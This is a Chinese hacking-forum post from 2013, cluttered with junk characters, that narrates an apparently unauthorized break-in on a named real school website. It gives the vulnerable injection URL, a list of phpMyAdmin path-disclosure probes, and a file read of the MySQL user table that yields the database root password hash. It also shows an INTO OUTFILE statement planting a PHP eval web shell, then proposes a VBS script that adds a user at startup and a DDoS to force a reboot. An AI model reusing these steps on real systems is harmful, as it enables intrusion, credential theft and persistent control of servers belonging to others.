找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2643|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
- `! T7 y) C6 L3 Y; y发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!, k! S* U7 K9 I: e
; |, F4 A% N! d0 v; N/ q8 n: u0 }% q
' c' B0 a# X: Y5 Z: P
& q9 v& y! {4 ^$ l* o$ ~
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
" V4 d5 [! g6 Y; t- f- M- j/ `2 |) A/ W) l( R5 {
那么想可以直接写入shell ,getshell有几个条件:
7 X% p0 i9 W' t% ]
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF  W' [  H" y4 i0 M

. d" W, e6 j8 w0 E$ r$ }试着爆绝对路径:/ e9 s2 u/ F) R- d: b
1./phpMyAdmin/index.php?lang[]=1  + I/ E8 v+ Z+ r3 \
2./phpMyAdmin/phpinfo.php  
! D! \/ \2 s6 d1 X0 z3./load_file()  
" v+ R4 ~& ?" t& l4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
4 `# }0 s% ^+ g5./phpmyadmin/libraries/select_lang.lib.php  * W2 k! R' Q9 f
6./phpmyadmin/libraries/lect_lang.lib.php  
7 t& I0 J& G7 f% U7./phpmyadmin/libraries/mcrypt.lib.php   
1 e. z* u% S. n" c8./phpmyadmin/libraries/export/xls.php  
1 L& t0 Q6 k3 q( E! U' Q) r% [% d7 T* Z! L
均不行...........................
0 {$ r8 P8 D8 K2 ~" J: h, j: C( G& j) p! w, V$ v) j
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
1 F) h4 ~3 \6 ?' ~$ r! I
# S- h! s' X0 o  z权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
4 \3 a2 T! n# _: C0 U5 `- f5 S% h$ E7 T
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败9 U  T' o* H9 \# t; y
1 T3 v, Y1 x- f  ^
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
5 ^- T2 [+ F; w) V1 R% Z: `3 z" j+ _4 A. c
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
/ H+ V! w. E5 A0 I8 y7 c
: G* F! R# r( C0 s3 q7 shttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
% m, c+ \2 E+ o$ ]/ |# ^6 m8 h. e9 c5 l2 V8 o  U" B" @% d
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 5 Y6 K1 U5 U# [0 D4 `0 C
) L& U4 s# d/ [' }) g
成功读到root密码:3 h5 H+ _: u9 z7 f

- k9 l3 K$ q! s9 X7 i17---- r(0072)' j) t- V! E+ S0 X
18---- o(006f): e# E' u2 Z4 N! o6 ^
19---- o(006f)' J) D* I4 t5 a; ]
20---- t(0074)
/ z" }4 A$ m$ p6 l' h21---- *(002a)* Q# T% B' o" s0 A6 A. M
22---- 8(0038)& ], e' u; g% K) ]2 s
23---- 2(0032)
6 B- `) l- \( j0 z5 x5 j) ]5 ]7 j24---- E(0045)4 U) _4 P9 Y! w9 m* L( L% R
25---- 1(0031)
6 G5 a4 l' ]( S1 Y- j9 @26---- C(0043)
* S6 u& `2 S3 i27---- 5(0035)
: K" g( u' @+ z# z9 c28---- 8(0038), e* c; \9 V+ l; |. O
29---- 2(0032)# l  {6 R; P4 H5 U
30---- 8(0038)
# Q3 ?( V# U/ y. c, l8 x3 X1 l31---- A(0041)
5 h' A* u4 W8 g32---- 9(0039)
/ ]% I- M$ U$ Z. W( V( e/ A, S) U33---- B(0042)
& E, Z; T' c3 |2 t7 V( U; ]34---- 5(0035)& z: N# F. V, C% e9 ]! ]
35---- 4(0034)
+ x7 P5 r3 K, G36---- 8(0038)1 H# m* w2 O3 {. M
37---- 6(0036)% H4 J# W8 s! ~/ C2 ~8 }/ M
38---- 4(0034)
7 p4 P) O# c% `- W) k8 \1 U39---- 9(0039)
3 M( Q9 A, c. ]4 C1 a40---- 1(0031)
" c  M3 {6 \5 R" @41---- 1(0031)) Y  y" t8 m" A; i
42---- 5(0035)
8 V- r7 ^& D1 m9 o+ \3 k5 T43---- 3(0033)
8 w  o2 y! ~$ G0 [9 b) j44---- 5(0035): d0 k5 ]5 |* Q( h
45---- 9(0039)
; T- L1 `* p5 a" A  i46---- 8(0038)
# G7 F7 j! H& J& t3 j) D! G47---- F(0046)
. z2 ^: U( t% h, `9 U; U48---- F(0046)$ @/ K; b: b8 y) g
49---- 4(0034)# r9 x0 X+ @+ ^/ g/ `- C# W# F/ O
50---- F(0046)  j) a7 V$ G5 ~5 e) p0 u* H
51---- 0(0030)
/ k. k; Q1 ^0 g) }% h& B9 v52---- 3(0033)1 ~; R( H% Z; }: z9 v
53---- 2(0032)* ~3 D9 Z* z! _& ]
54---- A(0041)1 T+ D9 w8 V7 O* ]  \
55---- 4(0034)
6 K2 I9 b& j9 K, Z  [2 n* F56---- A(0041)
/ W* o  J4 y# N/ R57---- B(0042), D" A1 H2 S; Q# ^( T6 ?
58---- *(0044)9 T! n5 E: Q7 l5 \, }
59---- *(0035)
. B% @- e9 b+ U4 h60---- *(0041)$ [5 a7 b2 n& I
61---- *0032)
3 G7 M, ]- {& [* e8 y
0 |! m- A) }) e+ |, _2 [解密后成功登陆phpmyamin+ I( Z8 O! C) v
                          
) q* X. B, Z% t, J+ a2 ^( A
$ G+ i6 \& I+ v" j5 u2 G6 w                             
* o$ L7 g5 y( u) n
2 Q8 |9 [0 N. }$ ?$ i找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
: K% y2 e/ L; o( x
# s% H! ~; p. G3 s7 m, {0 W5 ~成功执行,拿下shell,菜刀连接:9 i- H% T( `. V1 i$ ?

$ G' u4 Y# w6 x6 P* u服务器不支持asp,aspx,php提权无果.................... T2 W! J& Y6 q( B) N$ z
, a0 V: l: a5 X! t3 z
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
8 K+ ?4 p8 B. ?' `8 }; _; E
服务器上已经有个隐藏帐号了

7 J6 M6 Z' J: F1 F
别名     administrators& `  `# e; U- k2 Y# i
注释     管理员对计算机/域有不受限制的完全访问权
4 T' h+ g; N  Q$ {7 }! L8 r3 _
成员

$ |' [: o* |. u: g5 I
-------------------------------------------------------------------------------! V& r3 X& h3 ^. i  ~) g! R
admin& H) H' j- Y$ j+ F6 V
Administrator
* T* v4 L4 a/ m7 lslipper$) e& s+ y7 i8 I4 ?  z6 D; W+ e
sqluser% }( e0 \+ p, V7 K/ e
命令成功完成。 * ~' d) d3 x  P

& V: b) r: t! E5 V0 J- a9 l- l服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。2 z" z) i  v9 ?# a

+ z8 {6 m* V( w# C$ f1 T! Yddos服务器重启,不然就只能坐等服务器重启了..............................., a# b* p( v0 e. H! T* W
& c# X" u$ [; J$ b3 r. W
      
0 p% a) [% T8 R0 `& T

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表